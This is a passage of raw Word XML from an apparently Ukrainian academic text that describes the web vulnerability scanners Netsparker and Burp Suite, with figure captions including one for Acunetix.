      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Рис </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>2.6.8.</w:t>
      </w:r>
      <w:r w:rsidRPr="00877BAF">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00877BAF">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t>Acunetix Web Vulnerability Scanner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F23C9C" w14:textId="64943F1F" w:rsidR="00877BAF" w:rsidRDefault="00877BAF" w:rsidP="00877BAF">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="011F6473" w14:textId="732CD9A5" w:rsidR="00877BAF" w:rsidRDefault="00877BAF" w:rsidP="00877BAF">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="1276"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00877BAF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">2.6.8.1 Опис </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Netsparker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF9172B" w14:textId="6E10BE51" w:rsidR="00877BAF" w:rsidRPr="005027FB" w:rsidRDefault="00C92CC5" w:rsidP="00877BAF">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C92CC5">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Netsparker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C92CC5">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>(рис. 2.6.8.</w:t>
      </w:r>
      <w:r w:rsidR="00376454">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00C92CC5">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00877BAF">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">– це </w:t>
      </w:r>
      <w:r w:rsidRPr="00C92CC5">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>п</w:t>
      </w:r>
      <w:r w:rsidR="00877BAF" w:rsidRPr="00C92CC5">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>овністю автоматичний сканер захищеності / безпеки веб-додатків (DAST, black box scanner, Web Application Security Scanner, Web Application Vulnerability Scanner) імітує атаки на сотні і тисячі веб-додатків і аналізує їх реакції для виявлення вразливостей і проблем безпеки. Простота у використанні і отриманні інкрементальних і</w:t>
      </w:r>
      <w:r w:rsidR="00877BAF" w:rsidRPr="005027FB">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> ретроспективних звітів, інтеграція </w:t>
      </w:r>
      <w:r w:rsidR="00877BAF" w:rsidRPr="00877BAF">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>CI</w:t>
      </w:r>
      <w:r w:rsidR="00877BAF" w:rsidRPr="005027FB">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r w:rsidR="00877BAF" w:rsidRPr="00877BAF">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>CD</w:t>
      </w:r>
      <w:r w:rsidR="00877BAF" w:rsidRPr="005027FB">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00877BAF" w:rsidRPr="00877BAF">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>ticketing</w:t>
      </w:r>
      <w:r w:rsidR="00877BAF" w:rsidRPr="005027FB">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r w:rsidR="00877BAF" w:rsidRPr="00877BAF">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>bug</w:t>
      </w:r>
      <w:r w:rsidR="00877BAF" w:rsidRPr="005027FB">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00877BAF" w:rsidRPr="00877BAF">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>tracking</w:t>
      </w:r>
      <w:r w:rsidR="00877BAF" w:rsidRPr="005027FB">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00877BAF" w:rsidRPr="00877BAF">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>systems</w:t>
      </w:r>
      <w:r w:rsidR="00877BAF" w:rsidRPr="005027FB">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00877BAF" w:rsidRPr="00877BAF">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>REST</w:t>
      </w:r>
      <w:r w:rsidR="00877BAF" w:rsidRPr="005027FB">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00877BAF" w:rsidRPr="00877BAF">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r w:rsidR="00877BAF" w:rsidRPr="005027FB">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>. [44]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27FA7AA1" w14:textId="586EFC5D" w:rsidR="00877BAF" w:rsidRPr="00877BAF" w:rsidRDefault="00877BAF" w:rsidP="00877BAF">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">У </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>netspaker</w:t>
      </w:r>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>н</w:t>
      </w:r>
      <w:r w:rsidRPr="00877BAF">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>айширша поверхню атаки (кількість знайдених вразливостей) з усіх комерційних сканерів, при абсолютній відсутності помилкових спрацьовувань. Високий ступінь автоматизації, в тому числі у визначенні сценаріїв, колективної роботи, кореляції одержуваних з скануючих модулів даних.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>[44]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A512DB5" w14:textId="34D45C85" w:rsidR="00877BAF" w:rsidRDefault="00877BAF" w:rsidP="00877BAF">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00877BAF">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Ключові функції</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA10262" w14:textId="77777777" w:rsidR="00877BAF" w:rsidRPr="00877BAF" w:rsidRDefault="00877BAF" w:rsidP="00877BAF">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00877BAF">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Високий рівень виявлення вразливостей</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5261207A" w14:textId="77777777" w:rsidR="00877BAF" w:rsidRPr="00877BAF" w:rsidRDefault="00877BAF" w:rsidP="00877BAF">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00877BAF">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Відсутність помилкових спрацьовувань; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CBD8251" w14:textId="77777777" w:rsidR="00877BAF" w:rsidRPr="00877BAF" w:rsidRDefault="00877BAF" w:rsidP="00877BAF">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00877BAF">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Повна автоматизація; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA1260F" w14:textId="77777777" w:rsidR="00877BAF" w:rsidRPr="00877BAF" w:rsidRDefault="00877BAF" w:rsidP="00877BAF">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00877BAF">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Контроль доступу та розрахована на багато користувачів середовище;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A553EE" w14:textId="111B4C21" w:rsidR="00772CE7" w:rsidRDefault="00877BAF" w:rsidP="008F0C58">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00877BAF">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Одна з найнижчих цін на ринку.</w:t>
      </w:r>
      <w:r w:rsidR="004B547E" w:rsidRPr="004B547E">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004B547E">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>[44]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11EAA283" w14:textId="77777777" w:rsidR="004B547E" w:rsidRPr="004B547E" w:rsidRDefault="004B547E" w:rsidP="004B547E">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:ind w:left="709"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AEBD865" w14:textId="277A24E6" w:rsidR="00C92CC5" w:rsidRDefault="00C92CC5" w:rsidP="00C92CC5">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="295615D0" wp14:editId="043F0F45">
            <wp:extent cx="6120130" cy="3442970"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="27" name="Рисунок 27" descr="Image result for netsp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netspark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3442970"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E66279" w14:textId="4B9F4DE7" w:rsidR="00C92CC5" w:rsidRPr="005027FB" w:rsidRDefault="00C92CC5" w:rsidP="00C92CC5">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Рис </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>2.6.8.</w:t>
      </w:r>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00376454">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Netsparker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042FCE29" w14:textId="38163815" w:rsidR="00C92CC5" w:rsidRDefault="00C92CC5" w:rsidP="00C92CC5">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="477241E3" w14:textId="77777777" w:rsidR="00376454" w:rsidRDefault="00376454" w:rsidP="00C92CC5">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24C123B4" w14:textId="3702F599" w:rsidR="00C92CC5" w:rsidRPr="00C92CC5" w:rsidRDefault="00C92CC5" w:rsidP="00C92CC5">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="1276"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00877BAF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">2.6.8.1 Опис та використання </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Burp</w:t>
      </w:r>
      <w:r w:rsidRPr="00C92CC5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Suite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EAF21C7" w14:textId="321A6A1A" w:rsidR="00C92CC5" w:rsidRPr="005027FB" w:rsidRDefault="00C92CC5" w:rsidP="00C92CC5">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C92CC5">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Burp Suite </w:t>
      </w:r>
      <w:r w:rsidR="00376454" w:rsidRPr="00C92CC5">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>(рис. 2.6.8.</w:t>
      </w:r>
      <w:r w:rsidR="00376454" w:rsidRPr="00376454">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="00376454" w:rsidRPr="00C92CC5">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00376454" w:rsidRPr="00376454">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00C92CC5">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>- це платформа для проведення аудиту безпеки веб-додатків . Містить інструменти для складання карти веб-додатки, пошуку файлів і папок, модифікації запитів, фаззінга, підбору паролів і багато іншого. Також існує магазин додатків BApp store, що містить додаткові розширення, що збільшують функціонал додатка. Варто відзначити і поява в останньому релізі мобільного помічника для дослідження безпеки мобільних додатків - MobileAssistant для платформи iOS.</w:t>
      </w:r>
      <w:r w:rsidR="004B547E">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004B547E" w:rsidRPr="004B547E">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>[4</w:t>
      </w:r>
      <w:r w:rsidR="004B547E" w:rsidRPr="005027FB">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>5]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42876431" w14:textId="4C69BE99" w:rsidR="00C92CC5" w:rsidRPr="005027FB" w:rsidRDefault="00C92CC5" w:rsidP="00C92CC5">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C92CC5">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Burp Suite - це інтегрована платформа, призначена для проведення аудиту веб-додатки, як в ручному, так і в автоматичних режимах. Містить інтуїтивно зрозумілий інтерфейс із спеціально спроектованими табами, що дозволяють поліпшити і прискорити процес атаки. Сам інструмент вдає із себе проксірующій механізм, що перехоплює і обробляє всі вступники від браузера запити. Є можливість установки сертифіката burp для аналізу https з'єднань.</w:t>
      </w:r>
      <w:r w:rsidR="004B547E" w:rsidRPr="004B547E">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
